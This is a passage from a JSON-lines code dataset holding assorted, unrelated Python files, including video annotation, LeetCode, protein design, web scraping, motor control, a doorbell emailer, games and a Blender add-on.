get_max_contour(binary):\n cnts,_ = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnt_max = []\n cnt_max_area = 0\n for cnt in cnts:\n tmp = np.zeros(binary.shape, np.uint8)\n tmp = cv2.drawContours(tmp, [cnt], -1, 255, -1)\n tmp = cv2.bitwise_and(binary,binary,mask=tmp)\n \n if np.sum(tmp) > cnt_max_area:\n cnt_max = cnt\n cnt_max_area = np.sum(tmp)\n return cnt_max\n\n#return a stack of images \"img_stacked\" containing only a specific region \"cnt\" of another stack of images \"imgs\"\ndef stack_different_imgs(imgs,cnt):\n stack = list()\n for img in imgs:\n img_tmp, bb = ia.get_fragment(img,cnt)\n stack.append(img_tmp)\n img_stacked = np.dstack(stack)\n return img_stacked, bb\n\n#combines the negative and positive prediction of two ANN\ndef combine_pos_neg(pos,neg,k=100):\n pos = dm.binary_it(pos,100,mask=True)\n neg = dm.binary_it(255-neg,100,mask=True)\n return cv2.bitwise_and(pos,neg)\n\n#load trained ANN \nkernel_size_conv = 9\nnet_whole = nh.create_net_3conv(kernel_size_conv,device=device)\nmodel_path = 'whole'\nnet_whole.load_state_dict(torch.load(model_path))\nnet_whole.eval()\ndim_whole = (128,128)\n\nkernel_size_conv = 9\nnet_fragment = nh.create_net_3conv(kernel_size_conv,device=device)\nmodel_path = 'fragment'\nnet_fragment.load_state_dict(torch.load(model_path))\nnet_fragment.eval()\ndim_fragment = (128,128)\n\nkernel_size_conv = 9\nnet_fragment_negative = nh.create_net_3conv(kernel_size_conv,device=device)\nmodel_path = 'fragment_negative'\nnet_fragment_negative.load_state_dict(torch.load(model_path))\nnet_fragment_negative.eval()\n\n#init video reader\nbase = 'test.avi'\npath_vid = base\ncap = cv2.VideoCapture(path_vid)\n\n#storage variables which will be annotated\nclass_this_list_1 = list()\nclass_this_list_2 = list()\nclass_this_list = list()\nclass_this_double_list = list()\nbehavior_list_1 = list()\nbehavior_list_2 = list()\ncenters_last = ((0,0),(100,100))\nlast = list()\n\nprint(\"start collecting data\")\nwhile 1:\n #read current frame\n ret,img = cap.read()\n #if video ended break while loop\n if not ret:\n break\n \n #make a first prediction for the whole current frame\n img_whole = nh.evaluate_plus_resizing(net_whole,img,dim_whole,device=device,normalize=nh.pytorch_normalize_3) \n \n #find contour of the shape of the first 
prediction\n cnts = ia.filtered_contours(img_whole)\n #make a second more accurate prediciton for each object of the first prediction\n #and combine them into a new image \"img_whole_plus_fragment\"\n img_whole_plus_fragment = np.zeros(img_whole.shape,dtype=np.uint8)\n for cnt in cnts:\n img_tmp, bb = ia.get_fragment(img,cnt)\n pos = nh.evaluate_plus_resizing(net_fragment,img_tmp,dim_fragment,device=device,normalize=nh.pytorch_normalize_3)\n neg = nh.evaluate_plus_resizing(net_fragment_negative,img_tmp,dim_fragment,device=device,normalize=nh.pytorch_normalize_3)\n img_fragment = combine_pos_neg(pos,neg)\n img_fragment = ia.remove_filtered_contours(img_fragment)\n \n \n img_whole_plus_fragment[bb[0]:bb[1],bb[2]:bb[3]] += img_fragment\n \n #find all the object from the second prediction\n cnts = ia.filtered_contours(img_whole_plus_fragment)\n \n #overlapping mice add to social interaction\n if len(cnts) == 1:\n class_this,_ = ia.get_fragment(img,cnts[0])\n class_this_mask,_ = ia.get_fragment(img,cnts[0],mask_it=True)\n class_this_double_list.append((class_this,class_this_mask))\n \n #single mice add to single behavior\n if len(cnts) == 2:\n #determine which mice is which\n centers = ia.center_of_contours(cnts)\n if get_distance(centers[0],centers_last[0]) + get_distance(centers[1],centers_last[1]) >= get_distance(centers[0],centers_last[1]) + get_distance(centers[1],centers_last[0]):\n cnts = [cnts[1],cnts[0]]\n centers = [centers[1],centers[0]]\n #save data which will be annotated \n centers_last = centers\n for cnt in cnts:\n class_this,_ = ia.get_fragment(img,cnt)\n class_this_mask,_ = ia.get_fragment(img,cnt,mask_it=True)\n \n if len(class_this_list_1) <= len(class_this_list_2):\n class_this_list_1.append((class_this,class_this_mask))\n else:\n class_this_list_2.append((class_this,class_this_mask))\n \n elif len(class_this_list_1) > 0:\n class_this_list.append(class_this_list_1)\n class_this_list.append(class_this_list_2)\n class_this_list_1 = list()\n class_this_list_2 = list()\n \n #break if 3000 elements were selected\n if len(class_this_list) == 3000:\n break\n \n\n#shuffle single behavior\nrandom.seed(42)\nnp.random.shuffle(class_this_list)\ntmp = list()\nfor it in class_this_list:\n tmp+=it\n\n\nbehavior = list()\n#-1 not determinable\n#0 exploring\n#1 grooming\n#2 rearing\nprint('Q rearing, W grooming, E exploring, esc quit, space skip')\nclass Found(Exception): pass\n#annotated single behavior by using the keybord\n#an image is shown to you and by pressing Q W E or space the image is annotated\ntry:\n for list_tmp in class_this_list:\n print('next_list')\n for index,split_this in zip(range(len(list_tmp)),list_tmp):\n img,cropped = split_this\n cv2.imshow('img',img) \n\n kk = 'filler'\n while(True):\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n print('its getting dark')\n raise Found\n if k == 113:#Q\n behavior.append(2)\n print('added',index,'to rearing')\n break\n if k == 119:#W\n behavior.append(1)\n print('added',index,'to grooming')\n break\n if k == 101:#E\n behavior.append(0)\n print('added',index,'to exploring')\n break\n if k == 32:\n print('added',index,'to not determinable')\n break\n\n #plt.imshow(img_without_background)\nexcept Found:\n pass\nprint(len(behavior))\ncv2.destroyAllWindows()\n\n\n\nbehavior = list()\n#-1 not determinable\n#3 keep down\n#4 close following\n#5 sniffing\n#0 exploring\nprint('Q sniffing, W close following, E keeping down, R exploring, esc quit, space skip')\n#annotated social behavior by using the keybord\n#an image is shown to you and by 
pressing Q W E R or space the image is annotated\ntry:\n for index,split_this in zip(range(len(class_this_double_list)),class_this_double_list):\n img,cropped = split_this\n cv2.imshow('img',img) \n\n kk = 'filler'\n while(True):\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n print('its getting dark')\n raise Found\n if k == 113:#Q\n behavior.append((cropped,5))\n print('added',index,'to sniffing')\n break\n if k == 119:#W\n behavior.append((cropped,4))\n print('added',index,'to close following')\n break\n if k == 101:#E\n behavior.append((cropped,3))\n print('added',index,'to keeping down')\n break \n if k == 114:#R\n behavior.append((cropped,0))\n print('add, ',index,'to Nothing')\n break\n if k == 32:#space\n print('added',index,'to not determinable')\n break\n\nexcept Found:\n pass\nprint(len(behavior))\ncv2.destroyAllWindows()\n\n\nX = list()\ny = list()\n#formate annotated behavior and save it \nfor cropped, behav in behavior:\n cropped = cv2.resize(cropped, (128,128), interpolation = cv2.INTER_AREA)\n X.append(cropped)\n \n ohv = [0]*(6)\n ohv[behav] = 1\n y.append(ohv)\nX = np.array(X)\ny = np.array(y)\nprint(X.shape,y.shape)\nnp.save('X_class.npy',X)\nnp.save('y_class.npy',y)","repo_name":"Robinkoehler1995/BehaviorPrediction","sub_path":"Annotate_Behavior.py","file_name":"Annotate_Behavior.py","file_ext":"py","file_size_in_byte":9789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14567892106","text":"import time, re\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom typing import List, Tuple, Union, Optional\nfrom heapq import heappop, heappush, heapify, heappushpop, heapreplace\nfrom collections import defaultdict, deque, Counter\nfrom itertools import accumulate, permutations, combinations, product, compress, zip_longest, pairwise, groupby\nfrom math import perm, comb, gcd, lcm, inf, ceil, floor, factorial, dist, sqrt\nfrom functools import cache, lru_cache, reduce\nfrom sortedcontainers import SortedList, SortedSet, SortedDict\nfrom bisect import bisect_left, bisect_right, insort, insort_left, insort_right\n\n\nclass Trie:\n\n def __init__(self):\n self.children = {}\n self.isEnd = False\n\n def insert(self, arr) -> None:\n node = self\n for ch in arr:\n if ch not in node.children:\n node.children[ch] = Trie()\n\n node = node.children[ch]\n node.isEnd = True\n\n\nclass Solution:\n def removeSubfolders(self, folder: List[str]) -> List[str]:\n folder.sort(key=lambda x: len(x))\n\n trie = Trie()\n\n res = []\n for fold in folder:\n fs = fold.split(\"/\")[1:]\n trie.insert(fs)\n\n def dfs(t, s):\n if t.isEnd:\n res.append(s)\n return\n for k in t.children:\n dfs(t.children[k], s + \"/\" + k)\n\n dfs(trie, \"\")\n return res\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.removeSubfolders(folder=[\"/a\", \"/a/b\", \"/c/d\", \"/c/d/e\", \"/c/f\"]))\n print(s.removeSubfolders(folder=[\"/a/b/c\", \"/a/b/ca\", \"/a/b/d\"]\n ))\n print(s.removeSubfolders(folder=[\"/a\", \"/a/b/c\", \"/a/b/d\"]))\n","repo_name":"ccctw-ma/leetcode","sub_path":"src/Medium/String/removeSubfolders.py","file_name":"removeSubfolders.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20074445844","text":"from copy import deepcopy\n\nfrom biotite.database.rcsb import fetch\nfrom biotite.structure import AtomArray\n\nfrom language import (\n ConstantSequenceSegment,\n MaximizePLDDT,\n MaximizePTM,\n MaximizeSurfaceExposure,\n 
MinimizeCRmsd,\n MinimizeDRmsd,\n MinimizeSurfaceHydrophobics,\n ProgramNode,\n VariableLengthSequenceSegment,\n get_atomarray_in_residue_range,\n pdb_file_to_atomarray,\n sequence_from_atomarray,\n)\n\n\ndef scaffolding_ace2() -> ProgramNode:\n binding_site_atoms: AtomArray = pdb_file_to_atomarray(fetch(\"6m0j\", format=\"pdb\"))\n binding_site_atoms = get_atomarray_in_residue_range(\n binding_site_atoms, start=23, end=42\n )\n binding_site_sequence: str = sequence_from_atomarray(binding_site_atoms)\n print(binding_site_sequence)\n\n leader_amino_acid_sequence = VariableLengthSequenceSegment(50)\n binding_site_sequence = ConstantSequenceSegment(binding_site_sequence)\n follower_amino_acid_sequence = VariableLengthSequenceSegment(50)\n\n return ProgramNode(\n energy_function_terms=[\n MaximizePTM(),\n MaximizePLDDT(),\n MinimizeSurfaceHydrophobics(),\n ],\n children=[\n ProgramNode(sequence_segment=leader_amino_acid_sequence),\n ProgramNode(\n sequence_segment=binding_site_sequence,\n energy_function_terms=[\n MaximizeSurfaceExposure(),\n MinimizeCRmsd(template=binding_site_atoms),\n MinimizeDRmsd(template=binding_site_atoms),\n ],\n energy_function_weights=[1.0, 10.0, 10.0],\n ),\n ProgramNode(sequence_segment=follower_amino_acid_sequence),\n ]\n )\n","repo_name":"facebookresearch/esm","sub_path":"examples/protein-programming-language/programs/functional_site_scaffolding.py","file_name":"functional_site_scaffolding.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":2471,"dataset":"github-code","pt":"3"} +{"seq_id":"36791854178","text":"import mimetypes\n\n\ndef encode_multipart_formdata(fields, files):\n \"\"\"参考urllib,拼接multipart/form-data类型的HTTP请求中body,\n 返回拼接的body内容及Content-Type\"\"\"\n boundary = \"----------ThIs_Is_tHe_bouNdaRY_$\"\n crlf = \"\\r\\n\"\n l = []\n for (key, value) in fields:\n l.append(\"--\" + boundary)\n l.append('Content-Disposition: form-data; name=\"%s\"' % key)\n l.append(\"\")\n l.append(value)\n for (key, filename, value) in files:\n\n l.append(\"--\" + boundary)\n l.append(\n 'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (key, filename)\n )\n l.append(\"Content-Type: %s\" % get_content_type(filename))\n l.append(\"\")\n l.append(value)\n l.append(\"--\" + boundary + \"--\")\n l.append(\"\")\n body = crlf.join(l)\n content_type = \"multipart/form-data; boundary=%s\" % boundary\n return content_type, body\n\n\ndef get_content_type(filename):\n return mimetypes.guess_type(filename)[0] or \"application/octet-stream\"\n\n\ndef encoded_dict(in_dict):\n if not in_dict:\n return\n out_dict = {}\n for k, v in in_dict.items():\n if isinstance(v, str):\n v = v.encode(\"utf8\")\n elif isinstance(v, bytes):\n # Must be encoded in UTF-8\n v.decode(\"utf8\")\n out_dict[k] = v\n return out_dict\n","repo_name":"khuencheng/torn-requests","sub_path":"torn_requests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29447293376","text":"from rest_framework import serializers\nfrom rest_framework.serializers import HyperlinkedIdentityField\n\nfrom django.utils.timesince import timesince\n\nfrom cocktail.models import Ingredient\n\ningredient_detail_url = HyperlinkedIdentityField(\n view_name='api-ingredients:detail',\n lookup_field='slug'\n )\n\n\nclass IngredientModelSerializer(serializers.ModelSerializer):\n url = ingredient_detail_url\n number_drinks = 
serializers.SerializerMethodField()\n class Meta:\n model = Ingredient\n fields = [\n 'url',\n 'name',\n 'user',\n 'slug',\n 'number_drinks'\n ]\n def get_number_drinks(self, obj):\n return obj.drink_set.all().count()\n\n\n\"\"\"\nclass WebpageURLModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = WebpageURL\n fields = [\n 'webpage_url',\n ]\n\nclass AmountModelSerializer(serializers.ModelSerializer):\n ingredient = IngredientModelSerializer()\n drinks = serializers.SerializerMethodField()\n\n class Meta:\n model = Amount\n fields = [\n 'amount',\n 'ingredient',\n 'drinks',\n ]\n\n def get_drinks(self, obj):\n qs = obj.drink_set.all()\n names = []\n for drink in qs:\n names.append(drink.name)\n return names\n\n\"\"\"\n","repo_name":"nelsondude/tipsyapp","sub_path":"cocktail/api/ingredients/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6329901443","text":"from picamera import PiCamera\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nimport smtplib\nimport datetime\nimport time\nimport storeFileFB\nimport sys\nimport uuid\n\ncamera = PiCamera()\n\nchat_id = 'GET-YOUR-OWN-CHAT-ID' # This chat ID should be the same as the one within the dong-call.py file\n\nfrom_email = 'FROM-EMAIL@EXAMPLE.com'\nto_email = 'TO-EMAIL@EXAMPLE.com'\n\ndef send_mail(eFrom, to, subject, text, attachment):\n # SMTP Server details: update to your credentials or use class server\n smtpServer='GET-YOUR-OWN-SERVER'\n smtpUser='GET-YOUR-OWN-USER'\n smtpPassword='GET-YOUR-OWN-PASSWORD'\n port=587\n\n # open attachment and read in as MIME image\n fp = open(attachment, 'rb')\n msgImage = MIMEImage(fp.read())\n fp.close()\n\n #construct MIME Multipart email message\n msg = MIMEMultipart()\n msg.attach(MIMEText(text))\n msgImage['Content-Disposition'] = 'attachment; filename=\"image.jpg\"'\n msg.attach(msgImage)\n msg['Subject'] = subject\n\n # Authenticate with SMTP server and send\n s = smtplib.SMTP(smtpServer, port)\n s.login(smtpUser, smtpPassword)\n s.sendmail(eFrom, to, msg.as_string())\n s.quit()\n\ncamera.start_preview()\nframe = str(uuid.uuid4()) # Creates unique ID for the image to avoid duplicates\n\nif __name__ == '__main__':\n currentTime = datetime.datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n fileLoc = f'YOUR-FILE-PATH-HERE/img/frame{frame}.jpg' # set location of image file\n camera.capture(fileLoc) # Camera takes a picture of anyone who rings the doorbell\n text= f'Dong! Someone rang your doorbell at {currentTime}, see who it is and talk with them at http://meet.jit.si/%s' % chat_id\n send_mail(from_email, to_email, 'Dong! 
Someone is at the door.', text, fileLoc) # Sends an email with the photo of the caller and a link to the meeting (in case the blynk app malfunctions)\n    print(f'frame {frame} taken at {currentTime}') # print frame number to console\n\n    storeFileFB.store_file(fileLoc)\n    storeFileFB.push_db(fileLoc, currentTime)\n","repo_name":"WergiForce/IOT-Application","sub_path":"dong-photo.py","file_name":"dong-photo.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6363943462","text":"from DBDynamics import Ant\nimport time\nimport random\n\nimport datetime\n\n# On Linux this is /dev/ttyUSB?, e.g. /dev/ttyUSB0, /dev/ttyUSB1\nm = Ant('/dev/ttyUSB0')\n# On Windows this is COM?, e.g. COM2, COM3\n# m = Ant('COM6')\n\n# Motor ID: range 1-120\nmid = 1\n\n# Set smooth position mode\nm.setPositionMode(id=mid)\n\n# Set running current: recommended range 200-1200; this is the current while the motor runs and can be tuned to the load; higher current makes lost steps less likely but produces more heat\nm.setRunningCurrent(id=mid, value=500)\n\n# Set holding current: recommended range 200-800; this is the current while the motor is idle, keep it as low as possible without losing steps to reduce heat\nm.setKeepingCurrent(id=mid, value=200)\n\n# Enable the motor; once enabled it is controlled by the driver\nm.setPowerOn(id=mid)\n\n# Set running speed: recommended range 1-300; the maximum speed depends on supply voltage and motor model\n# Speed unit: pulse/10ms, approximately RPM; a 4-wire 2-phase motor with a 1.8-degree step angle corresponds to 50000 pulses per revolution\nm.setTargetVelocity(id=mid, value=200)\n\n# Set acceleration time: unit ms, recommended range 100-2000\n# For heavier loads, increase the acceleration time to prevent lost steps\nm.setAccTime(id=mid, value=100)\n\n\n# Helper function: rotate to an absolute angle (0 at power-on or at the home position)\ndef moveAngle(motor_id, theta):\n    # 360 degrees corresponds to 50000 pulses\n    k = 50000 / 360.0\n    pos = theta * k\n    m.setTargetPosition(id=motor_id, value=int(pos))\n\n\n# Helper function: wait until the target position is reached\ndef wait(motor_id):\n    time.sleep(0.5)\n    m.waitTargetPositionReached(id=motor_id)\n\n\nfor i in range(0, 10):\n    moveAngle(mid, 90 * i)\n    wait(mid)\n\nm.stop()\n","repo_name":"DBDynamics/PythonSDK","sub_path":"antDemo.py","file_name":"antDemo.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"zh","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
+{"seq_id":"23595082714","text":"import os\nimport urllib\nimport userAgent\nimport time\nfrom BeautifulSoup import BeautifulSoup          # For processing HTML\nfrom urllib import FancyURLopener\nimport datetime\nfrom datetime import datetime\n\nclass century21Details():\n\tdef domain(self):\n\t\treturn \"century21\"\n\n\tindexBaseURL = \"http://www.century21.ca\"\n\t\n\tdef indexURL(self,page):\n\t\treturn self.indexBaseURL+\"/CA/BC/Victoria/0-/Page\"+str(page)\t\n\n\tdef allInfoLinks(self, content):\n\t\tlinks = []\n\t\tsoup = BeautifulSoup(content)\n\t\tlinkData = soup.findAll('tr')\n\t\tfor link in linkData:\n\t\t\tif link.has_key('onclick') and \"location.href='/Property/BC/\" in link['onclick']:\n\t\t\t\tdetailsURL = link['onclick'].replace(\"location.href=\",\"\").replace(\"'\",\"\")\n\t\t\t\tlinks.append(detailsURL)\n\t\tlinks = list(set(links))\n\t\treturn links\n\n\n\tdef mlsFromPosting(self,content):\n\t\tsoup = BeautifulSoup(content)\n\t\tmlsTR = soup.find('tr', {\"id\":\"IDXRow\"})\n\n\t\tif mlsTR:\n\t\t\ttds = mlsTR.findChildren()\n\t\t\tif len(tds)==2:\n\t\t\t\tmls = str(tds[1].text)\n\t\t\t\tif mls!=\"n/a\":\n\t\t\t\t\treturn mls\n\t\treturn \"no_mls\"\n","repo_name":"joram/realestate","sub_path":"scrape/detailsCentury21.py","file_name":"detailsCentury21.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"32146108580","text":"from datetime import datetime\n\ndef timer(funk):\n    def wrapper(*args, **kwargs):\n        start = datetime.now()\n        res = funk(*args, **kwargs)\n        print(datetime.now() - start)\n        return res\n    
return wrapper\n\n@timer\ndef solution(number):\n    x = 0\n    for i in range(number):\n        if i %3 ==0 or i% 5==0:\n            x += i\n    return(x)\n\n@timer\ndef solution1(number):\n    return sum(x for x in range(number) if x % 3 == 0 or x % 5 == 0)\nprint(solution1(10**7))\nprint(solution(10**7))\n","repo_name":"Kovigen/Exp","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"75166671762","text":"import pygame\nimport random\nimport math\nfrom settings import ShipSettings\nfrom utilities import log_message, return_distance\nfrom bullet import Bullet\n\nclass Ship(pygame.sprite.Sprite):\n    def __init__(self, earth):\n\n        pygame.sprite.Sprite.__init__(self)\n\n        earth.a_game.logger.update_log(\"ship created\")\n        self.offset = random.uniform(0.6,1)*200\n        self.orbital_angle = 0\n        self.settings = ShipSettings()\n        self.earth = earth\n        self.hp = 100\n\n        self.location = [a_i - b_i for a_i, b_i in zip(earth.rect.center, [0, self.offset])]\n        print(self.location)\n        self.screen = earth.screen\n        self.screen_rect = earth.screen.get_rect()\n\n        #self.image = pygame.image.load('images/ship.bmp')\n        self.master_image = pygame.image.load('images/ship.bmp')\n        self.image = self.master_image.copy()\n        self.rect = self.image.get_rect()\n        self.rect.center = self.location\n\n        self.bullets = pygame.sprite.Group()\n\n\n    def blitme(self):\n        self.screen.blit(self.image, self.rect)\n\n    def update_position(self):\n        self.orbital_angle -= self.settings.ship_angular_speed\n        self.rect.center = [a_i - b_i for a_i, b_i in zip(self.earth.rect.center, [self.offset*math.sin(self.orbital_angle), self.offset*math.cos(self.orbital_angle)])]\n        self.open_fire(self.detect_nearest_hostile(300))\n        self.image = pygame.transform.rotate(self.master_image, self.orbital_angle * 360 / (2 * math.pi))\n\n\n    def detect_nearest_hostile(self, range):\n        distance = 10000\n        for enemy in self.earth.a_game.encounter.enemies:\n            distance_to_enemy = return_distance(self, enemy)\n            if distance_to_enemy < distance:\n                distance = distance_to_enemy\n                nearest_hostile = enemy\n        if distance < range:\n            return nearest_hostile\n        else:\n            return 0\n    \n    def open_fire(self, hostile):\n        if hostile != 0:\n            if len(self.bullets) < 1:\n                new_bullet = Bullet(self, hostile)\n                self.bullets.add(new_bullet)\n                self.earth.a_game.bullets.add(new_bullet)\n                hostile.targeting_bullets.add(new_bullet)\n\n    def receive_damage(self, amount):\n        self.hp -= amount\n        if self.hp < 0:\n            self.delete_ship()\n    \n    def delete_ship(self):\n        self.kill()\n        del self\n\n\n    \n    ","repo_name":"danny-hunt/Alienz","sub_path":"ships.py","file_name":"ships.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"33036191853","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\ndef get_data(req_url):\n    \"\"\"Fetch data\"\"\"\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',\n        'Accept-Language': 'zh-Hans-CN, zh-Hans;q=0.5'\n    }\n    resp = requests.get(req_url, headers=headers)\n    resp.encoding = 'utf8'  \n    if resp.status_code == 200:\n        return resp.text\n    else:\n        return None\n\ndef parse_data(resp_html):\n    \"\"\"Parse data and return a list\"\"\"\n    soup = BeautifulSoup(resp_html, features='html.parser')\n    # print(soup.prettify())\n    focus_table = soup.find(\"div\", attrs={'id': 'focus'})\n    # print(focus_table)\n    focus_list = focus_table.find_all('li')\n    # 
print(focus_list)\n    res_list = []\n    for focus in focus_list:\n        title = focus.find('img').get('alt')\n        img = focus.find('img').get('src')\n        res_item = {\n            '标题': title,\n            '图片': img,\n        }\n        res_list.append(res_item)\n    return res_list\n\n\ndef save_data(res_list):\n    \"\"\"Save data\"\"\"\n    with open('focus.json', 'w', encoding='utf-8') as f:\n        res_list_json = json.dumps(res_list, ensure_ascii=False)\n        f.write(res_list_json)\n        print(res_list_json)\n\n\nif __name__ == '__main__':\n    req_url = 'http://www.cps.com.cn/'\n    # Fetch data\n    resp_html = get_data(req_url)\n    # Parse data\n    res_list = parse_data(resp_html)\n    #print(res_list)\n    # Save data\n    save_data(res_list)","repo_name":"xwuman/py-samples","sub_path":"cps-focus/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13143206146","text":"# Advent of code Day 10 | 2023\n# https://adventofcode.com/2023/day/10\nprint(\"Advent of code Day 10 | 2023\\n\")\nimport time\n\nwith open(\"./input/day_10.in\", \"r\") as f:\n    data = [list(line.strip()) for line in f.readlines()]\n\n\n# Part 1\nstart_1 = time.time()\n\n\ndef find(item, matrix):\n    for i in range(len(matrix)):\n        if item not in matrix[i]:\n            continue\n\n        return (i, matrix[i].index(item))\n\n    return None\n\n\ndef get_next(pos, matrix, last=None):\n    row, col = pos\n    current = matrix[row][col]\n\n    top, bottom = (row - 1, col), (row + 1, col)\n    left, right = (row, col - 1), (row, col + 1)\n\n    if current in [\"|\", \"L\", \"J\", \"S\"] and row > 0:  # TOP\n        if top != last and matrix[top[0]][top[1]] != \".\":\n            return top, pos\n\n    if current in [\"|\", \"F\", \"7\", \"S\"] and row < len(matrix):  # BOTTOM\n        if bottom != last and matrix[bottom[0]][bottom[1]] != \".\":\n            return bottom, pos\n\n    if current in [\"-\", \"7\", \"J\", \"S\"] and col > 0:  # LEFT\n        if left != last and matrix[left[0]][left[1]] != \".\":\n            return left, pos\n\n    if current in [\"-\", \"F\", \"L\", \"S\"] and col < len(matrix[0]):  # RIGHT\n        if right != last and matrix[right[0]][right[1]] != \".\":\n            return right, pos\n\n    return None, None\n\n\nlength = 1\ncurrent, last = get_next(find(\"S\", data), data)\n\nwhile data[current[0]][current[1]] != \"S\":\n    current, last = get_next(current, data, last)\n    length += 1\n\nlength //= 2\nprint(f\"[PART 1] Time: {(time.time() - start_1):.4f}s   Result: {length}\")\n","repo_name":"Bartek-M/Advent-Of-Code","sub_path":"2023/day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"16231040928","text":"'''\r\nCopyright (C) 2018 Jean Da Costa machado.\r\nJean3dimensional@gmail.com\r\n\r\nCreated by Jean Da Costa machado\r\n\r\n    This program is free software: you can redistribute it and/or modify\r\n    it under the terms of the GNU General Public License as published by\r\n    the Free Software Foundation, either version 3 of the License, or\r\n    (at your option) any later version.\r\n\r\n    This program is distributed in the hope that it will be useful,\r\n    but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\r\n    GNU General Public License for more details.\r\n\r\n    You should have received a copy of the GNU General Public License\r\n    along with this program.  
If not, see .\r\n'''\r\n\r\nimport bpy\r\n\r\n\r\nclass FlowToolsSymmetrize(bpy.types.Operator):\r\n bl_idname = \"sculptkt.symmetrize\"\r\n bl_label = \"SculpTKt Symmetrize\"\r\n bl_description = \"\"\r\n bl_options = {\"REGISTER\", \"UNDO\"}\r\n\r\n direction = bpy.props.EnumProperty(\r\n name=\"Direction\",\r\n items=[\r\n (\"NEGATIVE_X\", \"-x to +x\", \"-x to +x\"),\r\n (\"POSITIVE_X\", \"+x to -x\", \"+x to -x\"),\r\n (\"NEGATIVE_Y\", \"-y to +y\", \"-y to +y\"),\r\n (\"POSITIVE_Y\", \"+y to -y\", \"+y to -y\"),\r\n (\"NEGATIVE_Z\", \"-z to +z\", \"-z to +z\"),\r\n (\"POSITIVE_Z\", \"+z to -z\", \"+z to -z\"),\r\n ]\r\n )\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n if context.active_object:\r\n return context.active_object.mode == \"SCULPT\"\r\n\r\n def invoke(self, context, event):\r\n bpy.ops.ed.undo_push()\r\n return self.execute(context)\r\n\r\n def execute(self, context):\r\n\r\n if context.active_object.use_dynamic_topology_sculpting:\r\n context.tool_settings.sculpt.symmetrize_direction = self.direction\r\n bpy.ops.sculpt.symmetrize()\r\n\r\n else:\r\n bpy.ops.sculpt.dynamic_topology_toggle()\r\n bpy.ops.sculpt.symmetrize()\r\n\r\n return {\"FINISHED\"}\r\n\r\n\r\ndef armature_tools(pie):\r\n pie.operator(\"sculptkt.convert_envelope_to_mesh\", icon=\"MESH_DATA\")\r\n pie.operator(\"sculptkt.add_envelope_armature\", text=\"Add Envelope Bone\", icon=\"BONE_DATA\")\r\n pie.operator(\"sculptkt.load_envelope_armature\", text=\"Add Envelope Base\", icon=\"MOD_ARMATURE\")\r\n\r\n\r\ndef add_tools(pie):\r\n pie.operator(\"sculptkt.add_envelope_armature\", text=\"Add Envelope Bone\", icon=\"BONE_DATA\")\r\n pie.operator(\"sculptkt.load_envelope_armature\", text=\"Add Envelope Base\", icon=\"MOD_ARMATURE\")\r\n\r\n\r\ndef object_tools(pie):\r\n pie.menu(\"OBJECT_MT_booleans\", icon=\"MOD_BOOLEAN\")\r\n pie.menu(\"OBJECT_MT_slash\", icon=\"SCULPTMODE_HLT\")\r\n pie.operator(\"object.mode_set\", text=\"Sculpt\", icon=\"SCULPTMODE_HLT\").mode = \"SCULPT\"\r\n pie.operator(\"object.mode_set\", text=\"Edit\", icon=\"EDITMODE_HLT\").mode = \"EDIT\"\r\n pie.operator(\"sculptkt.add_envelope_armature\", text=\"Add Envelope Bone\", icon=\"BONE_DATA\")\r\n pie.operator(\"sculptkt.load_envelope_armature\", text=\"Add Envelope Base\", icon=\"MOD_ARMATURE\")\r\n pie.operator(\"sculptkt.optimized_remesh\", icon=\"MOD_REMESH\")\r\n pie.operator(\"sculptkt.decimate\", text=\"Decimate\", icon=\"MOD_DECIM\").popup = True\r\n\r\n\r\ndef sculpting_tools(pie):\r\n separation = 7\r\n\r\n row = pie.row()\r\n col = row.column()\r\n col.scale_x = 0.7\r\n sub_sculpt_brush_tools(col)\r\n sub_sculpt_dyntopo_tools(col)\r\n sub_sculpt_symmetry(col)\r\n\r\n for i in range(separation):\r\n row.separator()\r\n\r\n row = pie.row()\r\n for i in range(separation):\r\n row.separator()\r\n\r\n col = 